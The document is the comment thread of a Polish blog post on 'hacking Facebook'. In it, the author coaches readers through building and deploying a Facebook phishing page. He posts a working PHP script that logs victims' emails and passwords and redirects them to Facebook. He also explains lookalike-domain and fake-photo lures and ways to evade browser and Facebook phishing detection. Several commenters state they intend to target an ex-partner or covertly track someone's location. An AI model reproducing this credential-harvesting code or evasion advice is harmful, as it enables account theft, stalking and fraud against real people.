144 thoughts to “Jak włamać się na facebooka?”

 1. Dzięki wielkie 😛 Teraz się zastanawiam jak komuś to przesłać ;/ Albo jak można to przesłać ?

  1. Często strony phishingowe są modyfikowane tak, aby wyglądały jak prowadzące do zdjęcia, które żeby móc zobaczyć trzeba się zalogować…

 2. Mam pytanie. Ładnie, pięknie stworzyłem plik login.php wchodzę na tą stronę, wpisuję hasło i w tym momencie powinien ukazac się plik logi.txt a u mnie go nie ma dlaczego ?

  1. Czy utworzyłeś poprawnie skrypt php? Odsyłam do filmiku, jeśli nie proszę ponownie pytać.

 3. I jeszcze coś. Widać że ta strona została pobrana, ponieważ jest bardziej rozciągnięta. Można jakoś temu zaradzić ?

  1. Można by spróbować pobrać stronę poprzez HTTrack Website Copier lub nauczyć się CSS/XHTML i spróbować zmodyfikować wygląd wedle gustu. Problem leży podejrzewam w arkuszach CSS. U mnie przy rozdzielczości 1366x nie widać znaczącej różnicy.

  1. Jak widzisz komentarz poprzedni nie został usunięty. Komentarze wymagają zatwierdzenia przez moderatora, aby inni nie rozsyłali spamu i złośliwego oprogramowania. Pozdrawiam

 4. Dzień dobry 🙂 od razu mówię, że jestem laik. Starałam się zrobić to tak jak mówiłeś w filmiku, problem taki, że w momencie kiedy zapiszę już grafikę i chcę skopiować nazwę, nie mam tego arkusza z końcówką bz. Z tego co widzę to ty tam masz 16 elementów w tym folderze a ja 15 co może być tego przyczyną? Pozdrawiam serdecznie

  1. Cześć! Właśnie sprawdziłem to o co zapytałaś i rzeczywiście… zapisało mi się za pomocą przeglądarki Chrome 14 elementów. Teraz pojawiły się u mnie arkusze o zupełnie innej nieco losowej nazwie, mechanizm tworzenia strony phishingowej został taki sam. Proszę prześledzić filmik i zobaczyć jak w systemie Windows pokazuje się w opcjach folderów rozszerzenia plików. Resztę zrobisz tak samo próbując odnaleźć odpowiednie elementy w plikach o rozszerzeniu .CSS (ten plik który miał na końcu bz miał rozszerzenie .CSS, są tylko dwa pliki z takim rozszerzeniem więc będzie łatwo). Pozdrawiam!!!

 5. Tak, zapisałem dobrze skrypt.
  Dobrze zmieniłem także w index.html. Mógłbyś mi może podesłać „swoją” stronę phishingową na mój adres e-mail ?

   1. Dzięki, bardzo. Tak, oczywiście, zacznę się uczyć od razu php dla ułatwienia 😉 Jeszcze raz dzięki. Pozdrawiam

    1. O ile do ataków na skrypty język PHP i SQL jest przydatny o tyle do tworzenia fajnych stron www (wygląd) to raczej CSS i HTML. Ciężko mi pomóc bo nie zajmuje się raczej graficzną stroną projektowania witryn www. Pozdrawiam

 6. ej jak się loguje i daje zaloguj to odsyła mnie do login.php ale wyskakuje na tej stronie taki tekst

  Notice: Undefined index: email in D:PISHINGhtdocslogin.php on line 2

  Notice: Undefined index: pass in D:PISHINGhtdocslogin.php on line 3

  1. A wpisałeś coś w polu e-mail i w polu hasło? Spróbuj zmodyfikowanego kodu który najpierw sprawdza czy coś zostało wgl wpisane na stronie imitującej facebooka.
   <?php if (!empty($_POST['email']) && !empty($_POST['pass'])) { $email = $_POST['email']; $pass = $_POST['pass']; $tekst = "E-mail: $email Hasło: $pass rn";$uchwyt = fopen("logi.txt", "a"); fwrite($uchwyt, $tekst); fclose($uchwyt); header("Location: https://www.facebook.com/login.php?login_attempt=1"); } ?>

 7. Witam. Czy ja też mógłbym prosić o podesłanie mi twojej stronki pishingowej? Coś mi nie idzie chce sobie porównać 😉

  1. Nie, ponieważ wszystko jest opisane i nie wymaga jakiejś olbrzymiej wiedzy i filozofii.

  1. Musisz czytać wpis dokładniej, ponieważ została w pewnym miejscu naniesiona aktualizacja wpisu i to na czerwono. Pozdrawiam 🙂

 8. eYTpPmSTXYE yek5jGn8pFA mam tylko takie 2 pliki nie ma tych rozszerzen o których pisałeś, przeszukałem wszystkie inne( na wszelki wypadek i nie moge tego znaleźć)

  thx za szybką odp.

  1. Musi być, pisze w wpisie na czerwono że nazwy mogą być różne od „…bz…”. Pozdrawiam!

 9. nie moge zamienic tych plikow zeby logo było jak to robisz ? Robie to samo co ty i nie moge ??? Wyskakuje mi ten komunikat Replace: Cannot replace text. The current document is read only.

  HELP

  1. Plik jest tylko do odczytu, musisz najpierw notatnik uruchomić jako administrator i dopiero otworzyć plik lub z powodu zapisania pliku w miejscu gdzie nie masz praw do zapisywania plików występuje ten problem i wystarczy przekopiować np: na pulpit, lub moich dokumentów.

 10. W xampp nie działa mi apache pomozesz jak naprawic pisza o portach zablokowanych ale nie moge znalezc jak odblokować….

  1. Może firewall systemowy zablokował, nie zadawał pytania czy nie odblokować? Chodzący xampp wyświetla bodajże na zielono dana usługa jak wystartuje dobrze. Z prostych serwerów www jest jeszcze WebServ.

  1. A masz xammpa? Uruchamiasz z adresu localhost a skrypt ma nazwe z rozszerzeniem .php? (a nie html lub txtr?)

 11. Wrzuciłem wszystko na server ftp, jednak po odpaleniu strony google chrome mi krzyczy „Ostrzeżenie: Podejrzenie witryny wyłudzającej dane (phishing)!”. Macie może jakieś sposoby na ominięcie tego ?

  1. W wpisie jest aktualizacja na czerwono, trzeba szukać bo nazwy są losowe okazuje się. Warto przyjrzeć najpierw się filmikowi na końcu wpisu jak to działa. Długi ale dokładny.

  1. Trzeba mieć swój darmowy lub płatny serwer FTP i wrzucić tam te pliki za pomocą np: FileZilli. Podstawy tworzenia stron www i umieszczenia ich w internecie to są. Najlepiej by domena przypominała fejsbukową (facebook.com). Można mieć też publiczne IP i na swoim komputerze mieć strone np: za pomocą xammpa z filmu, podajesz wtedy IP ofierze a ona wpisuje go w przeglądarke lub nakładasz na to coś w stylu noip.com, lub darmowy alias.

 12. Witam działa mi wszystko elegancko tylko, jak wysyłam to facebook to odrazu blokuje i oznacza jaka niebezpieczna strone jak to ominąć ?

  1. W dniu premiery wpisu, nie wykrywało jeszcze… Odpowiadałem już w komentarzach w tym wpisie jak włamać się na fb: „Trzeba spróbować troszkę zmodyfikować kod, zdjęcia, html albo CSS.”

 13. Witam, fb już ogarnął chyba, bo po kliknięciu „Zaloguj się” nie przekierowuje do naszego pliku tylko nadal zostaje action=”https://www.facebook.com/login.php?login_attempt=1″, mimo zmiany w kodzie. Wie ktoś jak to ruszyć ??

   1. tak rozumiem, tylko jeśli nie dołączę funkcji header, nadal jest tak samo (tzn. przekierowuje, ale nie do login.php).
    Wpisując testowe login i hasło także nie tworzy się, zadany plik z logami. Jakieś pomysły?

    1. A zmodyfikowałeś wedle poradnika plik index.php czy tam index.html (jego formularz)? parametr action na login.php?

     1. oczywiście wszystko wg filmiku, i to kilkakrotnie ;/ ale zawsze ten sam efekt.
      W pliku login.php nie trzeba zadać konkretnej scieżki, aby tworzył tam „logi.txt”

     2. oczywiscie zmodyfikowałem wg poradnika, kilkakrotnie wykonywałem całość od początku, ale zawsze to samo( nie odsyła do login.php po kliknięciu „zaloguj się”) a takze nie tworzy pliku „logi.txt”. Pytam czy w formule pliku”login.php” nie trzeba zadać konkretnej ścieżki w ktorej ma tworzyć plik”logi.txt”

     3. Nie, wydaje mi się że nie zmodyfikowałeś pliku index.html (parametr action na login.php trzeba zmienić w formularzu).

     4. dawał komunikat że strona z phisingiem, mimo że zezwoliłem na otwieranie to dalej blokwał… po wyłączeniu go wszystko działa 😉

 14. tylko jak to zmodyfikować, mógłbyś wytłumaczyć jestem dopiero można powiedzieć początkujący i sam nie umiem takich rzeczy 🙂

   1. Możesz dokładnie opisac jak zmodyfikować to aby facebook nie wykrywał że to do wyłudzania informacji ?

  1. Pewnie dało by się, wymaga dobrego zrozumienia działania nagłówków HTTP, ciasteczek, mechanizmu sesji, i nieco bardziej zaawansowanej znajomości języka PHP (dokładniej cURL’a).

 15. wszystko ładnie działa wystarczy trochę znajomości html. php i da się coś z tego wykombinować, jednak jakby to (swój adres) wysłać ofierze wiadomo ze domena facebook.com jest jedyna a jak tu zrobić bardzo podobny adres jakiś allias albo coś ;[

  1. Np: Link do zdjęcia nie przypomina facebooka: scontent-a-ams.xx.fbcdn.net/hphotos-ash3/1044862_475686322500463_698682795_n.jpg

   Za pomocą HTML + CSS + Photoshop/Gimp można zrobić imitacje strony, że aby zobaczyć zdjęcie musisz się zalogować.

 16. Siemka. Sorki ze jako setny pytam.
  Robilem krok po kroku wszystko, co Ty na filmie, po zapisaniu i po przekierowaniu do pliku login.php, pojawia sie blad:

  Parse error: syntax error, unexpected '$uchwyt’ (T_VARIABLE) in C:xampphtdocslogin.php on line 6

  Line 6 to przecierz:
  $uchwyt = fopen(„logi.txt”, „a”);

  Potem skopiowalem od Ciebie i to samo 🙁

  Pozdrawiam i z gory dziekuje 🙂

 17. Robiłam wszystko zgodnie z instrukcją na filmiku! Mam jednaj problem z dodaniem napisu
  ” facebook” . Wydaje mi sie że wszystko robie dobrze a mimo tego po zmianie w dalszym ciągu nie wyświetla sie napis…

 18. a zrobiłbyś poradnik jak wysłać tą strone ofierze. i byś opisał jak zmienić adres i wgl jak zrobić taką stronę. było by fajnie…co o tym myślisz?

 19. Rozumiem metoda prób i błędów udało sie. Wystapił jednak kolejny problem, otóż jak juz się loguje na stronce to wyskakuje mi inf:
  Parse error: syntax error, unexpected '=’ in C:xampphtdocslogin.php on line 7
  Czy wiadomo jaki błąd popełniłam?

  1. Błąd występuje w 6 albo 7 linijce, może brakować np średnika lub znaku dolara. Powinno być:
   $uchwyt = fopen(„logi.txt”, „a”);
   fwrite($uchwyt, $tekst);

 20. mam problem moja strona została zgłoszona jako wyłudzanie informacji i jak zrobić żeby nie wykrywało to jako wyłudzanie.. muszę coś zmienić w index.html ??

  1. Odpowiedź padłą kilka razy już w komentarzach. Problem tkwi że wiele osób zaczęło wykorzystywać ten skrypt z naszej strony i stał się wykrywalny.

   1. dobrze udało mi się wszystko zmodyfikować… i narazie nie wykrywa … pewnie do czasu. ale ogólnie to dzięki za ten poradnik bardziej go wykorzystam do celów edukacyjnych niż do przestępczości.

 21. Jaki może byc powód tego, że po wpisaniu danych i kliknieciu „zaloguj” dane nie sa przekazywane do logi.txt ?
  Jesli otwieram przez localhost to wszystko jest tak jak powinno.
  Siedze nad tym i mysle że sama nie jestem w stanie tego ogarnąc… proszę więc o pomoc

  1. XAMPP to też serwer (localhost), proszę sprawdzić przez klienta ftp czy plik naprawdę się nie pojawia tam.

   1. Wrzuciłam pliki na swoj hosting ( zalozony na ugu.pl) przez filezille . Pisząc że otwieram przez localhost,mialam na mysli Xamppa. Plików w dalszym ciągu nie ma.

     1. Wczesniej probowałam przez cba.pl jednakże wtedy pojawial się problem z samym połączeniem. Pojawia się informacja:
      Błąd: Błąd krytyczny
      Błąd: Nie można połączyć się z serwerem

 22. gdy wpisuję „localhost” w przeglądarkę-stronka nie wchodzi,
  gdy kliknę sobie na plik „index.html” wszystko działa… coś nie tak czy się nie przejmować i działać dalej? 😉

  1. A uruchomiłeś wedle filmiku XAMPP’a? Bo musisz mieć serwer żeby localhost działał… sama nazwa wskazuje LOCAL.

 23. Po kliknięciu „zaloguj się”:
  – nie otwiera się nowy plik (z zapisanym emailem oraz hasłem);
  – przeglądarka nie przekierowuje nas na pustą stronę (tak jak jest pokazane na filmiku), tylko stronę z tekstem pliku „login.php”- na stronie widzimy nasz kod;

  Wszystkie kroki zostały powtórzone 3 razy… co może być źle zrobione?

 24. Witam, male pytanie. Czy komus udalo sie uzyskac cudze haslo na fb? Wiem, ze moja ofiara ma wlaczona opcje dodatkowa na fb – za kazdym razem gdy loguje sie z innego urzadzenia niz ma dodane na fb, dostaje smsa. Nawet jak uzyskam haslo, to jestem wiecej niz pewna, ze zorientuje sie, ze to ja przez nazwe mojej wsi za granica, ktora zna na pamiec. Zawsze ostatnia aktywnosc na fb jest pokazana z numer IP i miasto. Czy ktos na dzien dzisiejszy jest w stanie to obejsc? Pozdrawiam

  1. Zły może plik otwierasz 🙂 musisz zbadać i poszukać tych dwóch pól formularza w których się wpisuje email i hasło.

 25. mozna sie z Toba dogadac i podac link do konta danej osoby, tak zebys uzyskal dla mnie haslo do jej konta? szczegoly mozna by bylo jeszcze omowic…. to moja ex dziewczyna o ktora jestem troche zazdrosny, bo jest z kims innym i chcialbym ja sledzic, a nie uprzykszac zycia…. ogolnie to dla mnie wazne, ale nie mam zamiary robic balaganu

  1. Nie, to nie moja sprawa łamanie prawa. Tak jak pisze na filmiku tylko do celów edukacyjnych aby zapoznać się z problemem a nie włamywać.

 26. zrobiłem wszystko i w xampp pojawia się plik z hasłami a na serwerze już nie ma, nawet sprawdzałem kilka serwerów i na wszystkich to samo

  1. Hmm, może serwer zewnętrzny https://www.haker.edu.pl/2013/10/29/darmowy-serwer-ftp/ nie ma uprawnień do zapisu pliku. Stwórz ręcznie na serwerze dodatkowo plik ten w którym są zapisywane loginy czyli logi.txt (tam gdzie mają być normalnie utworzone) i ustaw tak zwane chmody (uprawnienia w systemach Unixopodobnych), w FileZilla robi się to tak że klika na plik prawym przyciskiem myszy logi.txt -> Prawa dostępu -> zaznaczyć wszystko (777).

 27. łamanie prawa? masz mi tylko udzielic informacji, ja jestem zbyt ograniczony intelektualnie zeby zrobic to sam.. albo wskaz mi jakis najprostszy sposob, poradnik, bez kitu prosba życia to jest.. wyslij mi jakies podstawy na maila psygoblin@o2.pl – cos dla poczatkujacych.. prosze…….

 28. wszystko git ale i tak po drodze mam jakies problemy bo czegos nie ma albo nie chce sie znalezc, a staram sie robic wszystko tak jak pokazales, a bez kitu jeden blad i juz jest lipa, bo nawet nie mam takiej wiedzy zeby to obejsc.. nie jestem informatykiem czy programista itp, totalnie nie znam sie na tym.. wyslalem Ci maila w kontaktach, moze przeczytasz , moze nie.. pzdr

 29. no ja wiem, ze nie mozesz, ale musisz mi pomoc, bo nie „znam” nikogo innego, tak pol zartem, pol serio.. wiem ze prowadzicie blog, dlatego chcialbym zamowic prenumerate..
  ps. moge wpasc na korepetycje?

   1. ok , nie bede juz rozkladal wszystkiego na czynniki pierwsze lub mowił w przenosni.. to i tak nie ma to wiekszego sensu.. poniewaz potrzebuje pomocy.. wsparcia.. ps. to w koncu nie czat.. bez kitu zrob mi gotowca, jak na filmiku, zreszta napewno masz i podeslij, tak bym mogl podeslac go swojej ofierze.. musze i tak sprawdzic swoja siłe persfazji.. wiem ze to zabrzmi niestosownie, ale prosze.!

 30. Dobry,
  Zrobiłem tak jak na filmiku wszystko pięknie chodzi ale jest jeden mały element który drażni oko a mianowicie gdy mamy rubrykę Rejestracja to są pogrubione napisy, a nad hasłem kropki, dało by to rade jakoś zmienić?
  Pozdrawiam

  1. poszukać podstaw (kursu) CSS + do analizy szybkiej elementu FireBug wtyczka dla Firefoxa lub „Zbadaj element” w chrome.

 31. Dobry,
  jeszcze jedno pytanko po wejsciu sie na chrome i wejsciu na stronke pokazuje komunikat ze Strona zgłoszona jako wyłudzająca informacje, da sie jakos to zmienic, jak by mozna by było prosic jak np zmodyfikować kod w odpowiedzi na Emaila
  Pozdrawiam

  1. Odpowiedź padła w komentarzach, trzeba zmodyfikować nieco stronę facebooka (szczególnie zdjęcia nie powinny być umieszczone za pomocą linków do stron facebooka a umieszczone na naszym hostingu).

 32. AgAzZz.. masz może jakis poradnik na temat tego,
  jak namierzyc osobe poprzez FB?
  ewentualnie aplikacje na telefon?

 33. no własnie nie mam czasu, moze wpadne i sie dogadamy? =) mam wpasc z flaszka? czy browarami? albo przyjedz do mnie, bez roznicy, abys tylko udzielil korepetycji, odplatnie oczywiscie.. 😀 ps. gdzie jakas ludzka solidarnosc w takich przykrych czasach, widze ze nie jestes w opozycji 😀

   1. byc moze, ale ja jestem za głupi na tego typu rzeczy, nie mam smykałki do takiej technologii.. w dodatku, az tak bardzo mnie to nie kreci, chyba ze chodzi o sluszna sprawe.. w tym wypadku o kobiete.. poprostu uzywa mobilnego FB na telefonie HTC, namowilem ja aby wgrala messengera ale jest jakis do kitu, bo nic mi to nie dalo.. w ogole na androidzie mysle ze o wiele lepiej i latwiej to wyglada, ale tez mozna recznie wylaczyc lokalizacje wiadomosci.. jest jakis inny sposob, jakas aplikacja? taka aby nie byla swiadoma ze przy okazji mi wysyla w trakcie pisania swoje polozenie.. ? bez kitu, az normalnie jestem gotow na wszystko aby tylko nauczyc sie tych kilku podstawowych trickow.. wez chociaz postaraj sie mnie jakos edukowac, wez mi cos podeslij abym mogl probowac.. prosze

     1. k***********0@w*.pl – jak np rozszyfrowac tego maila? jest cos co skanuje rozne kombinacje?

      w dodatku po odgadnieciu jak zlamac haslo aby dostac sie na maila? pzdr

     2. Jeżeli zakładamy że każda gwiazdka to znak to mamy 12 gwiazdek więc dla alfabetu składającego się z 26 znaków 26*26*26*26*26*26*26*26*26*26*26*26 kombinacji (26 do potęgi 12). Można by napisać taki program ale ilość kombinacji jest zbyty duża aby zweryfikować która kombinacja jest prawidłowa. Do tego widze że dochodzą cyfry bo na końcu jest zero, jedyne co jesteśmy pewni to że prawdopodobnie na wp.pl. Raczej tego się nie złamie

 34. 20:34:24 [Apache] Problem detected!
  20:34:24 [Apache] Port 80 in use by „system”!
  20:34:24 [Apache] Apache WILL NOT start without the configured ports free!
  20:34:24 [Apache] You need to uninstall/disable/reconfigure the blocking application
  20:34:24 [Apache] or reconfigure Apache to listen on a different port

  kiedy chce wystartować apache to mi wyświetla, próbowałem zmienić w config z 80 na 8080 nic nie dało ponoć skype blokuje ale mam go wyłącznego co mogę jeszcze zrorbić?
  a po próbach różnych mam teraz taki

  Port 443 in use by „C:Program FilesPando NetworksMedia BoosterPMB.exe” with PID 1084!

  czy zmiana portu 443 coś da i bez różnicy na jaki ?

  1. a teraz po próbach mam to
   13:59:02 [Apache] Apache Service detected with wrong path
   13:59:02 [Apache] Change XAMPP Apache and Control Panel settings or
   13:59:02 [Apache] Uninstall/disable the other service manually first
   13:59:02 [Apache] Found Path: „C:UsersAdrianDesktopnowy folderxamppapachebinhttpd.exe” -k runservice
   13:59:02 [Apache] Expected Path: „c:xamppapachebinhttpd.exe” -k runservice

   1. Spróbuj jako administrator uruchomić lub zainstalować jeszcze raz (po wcześniejszej deinstalacji). Zamiast XAMPPa możesz użyć WebServ 2

  2. A spróbowałeś uruchomić jako administrator XAMPPA? Prawy przycisk myszy -> uruchom jako administrator

 35. Cześć:)
  A co jak ktoś ma automatyczne logowanie na facebooka? Nie będzie z tym żadnego problemu ;)?

  1. Automatyczne logowanie jak to nazywasz sprawdza adres www (domene) i jeśli jest to facebook.com to wypełnia login i hasło, w phishingu używasz podrobionej własnej domeny stąd osoba będzie musiała wpisać dane jeszcze raz.

   1. Dzięki;) Jak uda się sprawdzić na własnej osobie rzecz jasna to napiszę jak poszło;)
    Miłego dnia;)

    1. Dziękuje za komentarz Michał i pozdrawiam. Należy pamiętać, że nie uprzedzenie osoby o próbie włamania się na konto jest przestępstwem!

     Pozdrawiam!

 36. Parse error: syntax error, unexpected end of file in C:xampphtdocslogin.php on line 10

  1. Błąd jest w 10 linii skryptu, ciężko mi powiedzieć bo u siebie na kilku systemach wklejam kod i działa 🙂

 37. witam,
  w celach edukacyjnych stworzylem strone phisingowa lecz tak jak inni pisali wyswietla sie napis ze strona jest niebezpieczna, przejrzalem wszystkie komentarze i napisales aby zmodyfikowac troche pliki, a moglbys objasnic jak to zrobic?

  1. da sie zrobic 😀
   a moglbys powiedziec w ktore pliki celowac? kombinowalem dzis z 3 h z ”00cv6P016Bz” ale nie szlo, sciagnalem tez strone fb z mojej strony fiszingowej zeby niebylo linkow obrazkow z fb ale tez kaszana
   pozdrawiam 😉

   1. U mnie sama zmiana obrazków na lokalne (z mojego serwera czyli ściągam z fejsa umieszczam u siebie i zmieniam w źródle) pomogła.

  1. Witam , mam pewien problem , wrzucam wszystkie pliki na darmowy serwer ftp i pojawia się tylko zarys strony , bez obrazków. Tylko same napisy. W czym może być problem ?

   1. Tam odpowiedź pada w wpisie i w filmie, trzeba modyfikować html/css i „Ściągamy ten plik z logiem i umieszczamy w folderze index_files

    fbstatic-a.akamaihd.net/rsrc.php/v2/yh/r/xQ0DwmqUr-m.png

  2. Witaj, czytałem komentarze, ale nie mogę znaleźć rozwiązania. Wykonałem wszystkie polecenia zgodnie z instrukcją, lecz nie następuje przekierowanie w adresie strony z localhost –> login.php . Zamieniłem w index.html linijkę na action=”login.php”, jednak nie dało to żadnego skutku. Z góry dziękuje za pomoc i pozdrawiam

  3. Nie działa mi, zrobłem wszystko tak jak opisane i jak wchodzę loguję się na FB i pokuzje błąd. Pomocy !!

  Komentarze są zamknięte.